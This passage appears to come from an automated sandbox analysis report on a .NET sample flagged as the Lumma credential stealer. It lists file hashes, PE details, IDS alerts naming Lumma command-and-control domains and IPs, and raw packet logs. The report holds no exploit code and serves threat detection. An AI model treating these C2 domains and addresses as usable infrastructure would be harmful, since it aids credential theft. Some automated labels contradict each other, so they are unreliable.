                                                                    https://xtrafree.x10.mx/Get hashmaliciousUnknownBrowse
                                                                    • 104.21.4.136
                                                                    • 172.67.189.2
                                                                    • 188.114.97.3
                                                                    • 172.67.162.108
                                                                    • 188.114.96.3
                                                                    • 104.102.49.254
                                                                    • 172.67.208.139
                                                                    PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                                                    • 104.21.4.136
                                                                    • 172.67.189.2
                                                                    • 188.114.97.3
                                                                    • 172.67.162.108
                                                                    • 188.114.96.3
                                                                    • 104.102.49.254
                                                                    • 172.67.208.139
                                                                    PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                                                    • 104.21.4.136
                                                                    • 172.67.189.2
                                                                    • 188.114.97.3
                                                                    • 172.67.162.108
                                                                    • 188.114.96.3
                                                                    • 104.102.49.254
                                                                    • 172.67.208.139
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.4.136
                                                                    • 172.67.189.2
                                                                    • 188.114.97.3
                                                                    • 172.67.162.108
                                                                    • 188.114.96.3
                                                                    • 104.102.49.254
                                                                    • 172.67.208.139
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 104.21.4.136
                                                                    • 172.67.189.2
                                                                    • 188.114.97.3
                                                                    • 172.67.162.108
                                                                    • 188.114.96.3
                                                                    • 104.102.49.254
                                                                    • 172.67.208.139
                                                                    HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.4.136
                                                                    • 172.67.189.2
                                                                    • 188.114.97.3
                                                                    • 172.67.162.108
                                                                    • 188.114.96.3
                                                                    • 104.102.49.254
                                                                    • 172.67.208.139
                                                                    bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.4.136
                                                                    • 172.67.189.2
                                                                    • 188.114.97.3
                                                                    • 172.67.162.108
                                                                    • 188.114.96.3
                                                                    • 104.102.49.254
                                                                    • 172.67.208.139

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3ZD5tEC5DH.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\3ZD5tEC5DH.exe
                                                                    File Type:CSV text
                                                                    Category:modified
                                                                    Size (bytes):425
                                                                    Entropy (8bit):5.353683843266035
                                                                    Encrypted:false
                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                    MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                    SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                    SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                    SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                    \Device\ConDrv

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\3ZD5tEC5DH.exe
                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):33
                                                                    Entropy (8bit):2.2845972159140855
                                                                    Encrypted:false
                                                                    SSDEEP:3:i6vvRyMivvRya:iKvHivD
                                                                    MD5:45B4C82B8041BF0F9CCED0D6A18D151A
                                                                    SHA1:B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
                                                                    SHA-256:7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
                                                                    SHA-512:B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:0..1..2..3..4..0..1..2..3..4.....

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.989600940155032
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:3ZD5tEC5DH.exe
                                                                    File size:374'784 bytes
                                                                    MD5:149131a90f99225e6c7e28a06164dd9a
                                                                    SHA1:f9d0e7ae3bed79498bf4da92c0ef9568d4e5595e
                                                                    SHA256:6b176bab868dc372496ab3c6ce97518d276c17143f77ae15c992970c1efdf21f
                                                                    SHA512:d6f611d974402adba0548c6f15527f2d7f45e2e5a3466ff2d1b93fcd9eb5ae22a96468e8d4c8d428167a0801f2e1f4a702384878a4fec230f79529ba975b309a
                                                                    SSDEEP:6144:+aiiJ6qfl9snkFV8FDU+CEMltZVMUwMDp8Aj/TmbGIenjfa9ckFuzyNQhsqayCcp:+aiiJjynkFVnTzl0Aj/TmbNenLnSQhsq
                                                                    TLSH:8F84235093E1168BD2242A324C87129D83E3FE74F0CE5FE5A365EA376EEE70410D975A
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.f................................. ........@.. ....................... ............`................................

                                                                    File Icon

                                                                    Icon Hash:00928e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x45ccee
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows cui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x66F463BB [Wed Sep 25 19:25:47 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5cc940x57.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5e0000x5b8.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x5cb5c0x1c.text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x5acf40x5ae00b78669443bdf65ef8228d4a29be393ffFalse0.9938585367950481data7.995705798028068IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x5e0000x5b80x600e0c57c891752f78d44441c65570fe51eFalse0.4381510416666667data4.119761219082767IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x600000xc0x20093175a635d4731115c9b1e1c282e8f9eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_VERSION0x5e0a00x324data0.4552238805970149
                                                                    RT_MANIFEST0x5e3c80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-09-26T09:58:36.812587+02002056048ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lootebarrkeyn .shop)1192.168.2.6520181.1.1.153UDP
                                                                    2024-09-26T09:58:36.830747+02002056164ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)1192.168.2.6598861.1.1.153UDP
                                                                    2024-09-26T09:58:37.420292+02002056165ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)1192.168.2.649710104.21.4.136443TCP
                                                                    2024-09-26T09:58:37.940927+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649710104.21.4.136443TCP
                                                                    2024-09-26T09:58:37.940927+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710104.21.4.136443TCP
                                                                    2024-09-26T09:58:37.948460+02002056162ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)1192.168.2.6622811.1.1.153UDP
                                                                    2024-09-26T09:58:38.424964+02002056163ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)1192.168.2.649711188.114.97.3443TCP
                                                                    2024-09-26T09:58:38.867301+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649711188.114.97.3443TCP
                                                                    2024-09-26T09:58:38.867301+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649711188.114.97.3443TCP
                                                                    2024-09-26T09:58:38.871156+02002056160ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)1192.168.2.6635041.1.1.153UDP
                                                                    2024-09-26T09:58:39.502747+02002056161ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)1192.168.2.649713188.114.96.3443TCP
                                                                    2024-09-26T09:58:39.963391+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649713188.114.96.3443TCP
                                                                    2024-09-26T09:58:39.963391+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649713188.114.96.3443TCP
                                                                    2024-09-26T09:58:39.967673+02002056158ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)1192.168.2.6507391.1.1.153UDP
                                                                    2024-09-26T09:58:40.443849+02002056159ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)1192.168.2.649714188.114.96.3443TCP
                                                                    2024-09-26T09:58:40.955377+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649714188.114.96.3443TCP
                                                                    2024-09-26T09:58:40.955377+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649714188.114.96.3443TCP
                                                                    2024-09-26T09:58:40.957085+02002056156ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)1192.168.2.6581081.1.1.153UDP
                                                                    2024-09-26T09:58:41.445111+02002056157ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)1192.168.2.649715172.67.162.108443TCP
                                                                    2024-09-26T09:58:41.923134+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649715172.67.162.108443TCP
                                                                    2024-09-26T09:58:41.923134+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649715172.67.162.108443TCP
                                                                    2024-09-26T09:58:41.924937+02002056154ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)1192.168.2.6653461.1.1.153UDP
                                                                    2024-09-26T09:58:42.419788+02002056155ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)1192.168.2.649716188.114.96.3443TCP
                                                                    2024-09-26T09:58:42.899946+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649716188.114.96.3443TCP
                                                                    2024-09-26T09:58:42.899946+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649716188.114.96.3443TCP
                                                                    2024-09-26T09:58:42.902228+02002056152ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)1192.168.2.6651271.1.1.153UDP
                                                                    2024-09-26T09:58:43.400411+02002056153ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)1192.168.2.649717188.114.96.3443TCP
                                                                    2024-09-26T09:58:43.844049+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649717188.114.96.3443TCP
                                                                    2024-09-26T09:58:43.844049+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649717188.114.96.3443TCP
                                                                    2024-09-26T09:58:43.845719+02002056150ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)1192.168.2.6554771.1.1.153UDP
                                                                    2024-09-26T09:58:44.319186+02002056151ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)1192.168.2.649718172.67.208.139443TCP
                                                                    2024-09-26T09:58:44.808684+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649718172.67.208.139443TCP
                                                                    2024-09-26T09:58:44.808684+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649718172.67.208.139443TCP
                                                                    2024-09-26T09:58:47.045311+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649720172.67.189.2443TCP
                                                                    2024-09-26T09:58:47.045311+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649720172.67.189.2443TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 26, 2024 09:58:36.849387884 CEST49710443192.168.2.6104.21.4.136
                                                                    Sep 26, 2024 09:58:36.849456072 CEST44349710104.21.4.136192.168.2.6
                                                                    Sep 26, 2024 09:58:36.849543095 CEST49710443192.168.2.6104.21.4.136
                                                                    Sep 26, 2024 09:58:36.873667955 CEST49710443192.168.2.6104.21.4.136
                                                                    Sep 26, 2024 09:58:36.873712063 CEST44349710104.21.4.136192.168.2.6
                                                                    Sep 26, 2024 09:58:37.420162916 CEST44349710104.21.4.136192.168.2.6
                                                                    Sep 26, 2024 09:58:37.420291901 CEST49710443192.168.2.6104.21.4.136
                                                                    Sep 26, 2024 09:58:37.424108982 CEST49710443192.168.2.6104.21.4.136
                                                                    Sep 26, 2024 09:58:37.424139977 CEST44349710104.21.4.136192.168.2.6
                                                                    Sep 26, 2024 09:58:37.424410105 CEST44349710104.21.4.136192.168.2.6
                                                                    Sep 26, 2024 09:58:37.478691101 CEST49710443192.168.2.6104.21.4.136
                                                                    Sep 26, 2024 09:58:37.500996113 CEST49710443192.168.2.6104.21.4.136
                                                                    Sep 26, 2024 09:58:37.500996113 CEST49710443192.168.2.6104.21.4.136
                                                                    Sep 26, 2024 09:58:37.501169920 CEST44349710104.21.4.136192.168.2.6
                                                                    Sep 26, 2024 09:58:37.940941095 CEST44349710104.21.4.136192.168.2.6
                                                                    Sep 26, 2024 09:58:37.941045046 CEST44349710104.21.4.136192.168.2.6
                                                                    Sep 26, 2024 09:58:37.941133976 CEST49710443192.168.2.6104.21.4.136
                                                                    Sep 26, 2024 09:58:37.943594933 CEST49710443192.168.2.6104.21.4.136
                                                                    Sep 26, 2024 09:58:37.943659067 CEST44349710104.21.4.136192.168.2.6
                                                                    Sep 26, 2024 09:58:37.963782072 CEST49711443192.168.2.6188.114.97.3
                                                                    Sep 26, 2024 09:58:37.963818073 CEST44349711188.114.97.3192.168.2.6
                                                                    Sep 26, 2024 09:58:37.963903904 CEST49711443192.168.2.6188.114.97.3
                                                                    Sep 26, 2024 09:58:37.964637041 CEST49711443192.168.2.6188.114.97.3
                                                                    Sep 26, 2024 09:58:37.964647055 CEST44349711188.114.97.3192.168.2.6
                                                                    Sep 26, 2024 09:58:38.424792051 CEST44349711188.114.97.3192.168.2.6
                                                                    Sep 26, 2024 09:58:38.424963951 CEST49711443192.168.2.6188.114.97.3
                                                                    Sep 26, 2024 09:58:38.439033031 CEST49711443192.168.2.6188.114.97.3
                                                                    Sep 26, 2024 09:58:38.439075947 CEST44349711188.114.97.3192.168.2.6
                                                                    Sep 26, 2024 09:58:38.439420938 CEST44349711188.114.97.3192.168.2.6
                                                                    Sep 26, 2024 09:58:38.440654039 CEST49711443192.168.2.6188.114.97.3
                                                                    Sep 26, 2024 09:58:38.440707922 CEST49711443192.168.2.6188.114.97.3
                                                                    Sep 26, 2024 09:58:38.440752983 CEST44349711188.114.97.3192.168.2.6
                                                                    Sep 26, 2024 09:58:38.867326975 CEST44349711188.114.97.3192.168.2.6
                                                                    Sep 26, 2024 09:58:38.867429972 CEST44349711188.114.97.3192.168.2.6
                                                                    Sep 26, 2024 09:58:38.867517948 CEST49711443192.168.2.6188.114.97.3
                                                                    Sep 26, 2024 09:58:38.867711067 CEST49711443192.168.2.6188.114.97.3
                                                                    Sep 26, 2024 09:58:38.867733955 CEST44349711188.114.97.3192.168.2.6
                                                                    Sep 26, 2024 09:58:38.867747068 CEST49711443192.168.2.6188.114.97.3
                                                                    Sep 26, 2024 09:58:38.867753983 CEST44349711188.114.97.3192.168.2.6
                                                                    Sep 26, 2024 09:58:38.887285948 CEST49713443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:38.887335062 CEST44349713188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:38.887397051 CEST49713443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:38.889820099 CEST49713443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:38.889837027 CEST44349713188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:39.502541065 CEST44349713188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:39.502747059 CEST49713443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:39.504498959 CEST49713443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:39.504511118 CEST44349713188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:39.504760981 CEST44349713188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:39.506138086 CEST49713443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:39.506158113 CEST49713443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:39.506220102 CEST44349713188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:39.963419914 CEST44349713188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:39.963551998 CEST44349713188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:39.963643074 CEST49713443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:39.963872910 CEST49713443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:39.963900089 CEST44349713188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:39.963920116 CEST49713443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:39.963927031 CEST44349713188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:39.982302904 CEST49714443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:39.982367039 CEST44349714188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:39.982440948 CEST49714443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:39.983043909 CEST49714443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:39.983062029 CEST44349714188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:40.443552017 CEST44349714188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:40.443849087 CEST49714443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:40.445590973 CEST49714443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:40.445621967 CEST44349714188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:40.445899010 CEST44349714188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:40.447316885 CEST49714443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:40.447360992 CEST49714443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:40.447407961 CEST44349714188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:40.955430984 CEST44349714188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:40.955538988 CEST44349714188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:40.955607891 CEST49714443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:40.955784082 CEST49714443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:40.955810070 CEST44349714188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:40.955825090 CEST49714443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:40.955831051 CEST44349714188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:40.979926109 CEST49715443192.168.2.6172.67.162.108
                                                                    Sep 26, 2024 09:58:40.979979038 CEST44349715172.67.162.108192.168.2.6
                                                                    Sep 26, 2024 09:58:40.980057955 CEST49715443192.168.2.6172.67.162.108
                                                                    Sep 26, 2024 09:58:40.980416059 CEST49715443192.168.2.6172.67.162.108
                                                                    Sep 26, 2024 09:58:40.980437040 CEST44349715172.67.162.108192.168.2.6
                                                                    Sep 26, 2024 09:58:41.444890022 CEST44349715172.67.162.108192.168.2.6
                                                                    Sep 26, 2024 09:58:41.445111036 CEST49715443192.168.2.6172.67.162.108
                                                                    Sep 26, 2024 09:58:41.459846973 CEST49715443192.168.2.6172.67.162.108
                                                                    Sep 26, 2024 09:58:41.459888935 CEST44349715172.67.162.108192.168.2.6
                                                                    Sep 26, 2024 09:58:41.460275888 CEST44349715172.67.162.108192.168.2.6
                                                                    Sep 26, 2024 09:58:41.472843885 CEST49715443192.168.2.6172.67.162.108
                                                                    Sep 26, 2024 09:58:41.475655079 CEST49715443192.168.2.6172.67.162.108
                                                                    Sep 26, 2024 09:58:41.475692034 CEST44349715172.67.162.108192.168.2.6
                                                                    Sep 26, 2024 09:58:41.923167944 CEST44349715172.67.162.108192.168.2.6
                                                                    Sep 26, 2024 09:58:41.923300028 CEST44349715172.67.162.108192.168.2.6
                                                                    Sep 26, 2024 09:58:41.923376083 CEST49715443192.168.2.6172.67.162.108
                                                                    Sep 26, 2024 09:58:41.923573971 CEST49715443192.168.2.6172.67.162.108
                                                                    Sep 26, 2024 09:58:41.923590899 CEST44349715172.67.162.108192.168.2.6
                                                                    Sep 26, 2024 09:58:41.923612118 CEST49715443192.168.2.6172.67.162.108
                                                                    Sep 26, 2024 09:58:41.923618078 CEST44349715172.67.162.108192.168.2.6
                                                                    Sep 26, 2024 09:58:41.939810038 CEST49716443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:41.939866066 CEST44349716188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:41.939959049 CEST49716443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:41.940361023 CEST49716443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:41.940378904 CEST44349716188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:42.419709921 CEST44349716188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:42.419787884 CEST49716443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:42.429162025 CEST49716443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:42.429184914 CEST44349716188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:42.429452896 CEST44349716188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:42.430577993 CEST49716443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:42.430608034 CEST49716443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:42.430659056 CEST44349716188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:42.899972916 CEST44349716188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:42.900079966 CEST44349716188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:42.900175095 CEST49716443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:42.900412083 CEST49716443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:42.900460005 CEST44349716188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:42.900490046 CEST49716443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:42.900506973 CEST44349716188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:42.918766022 CEST49717443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:42.918833017 CEST44349717188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:42.918912888 CEST49717443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:42.919437885 CEST49717443192.168.2.6188.114.96.3
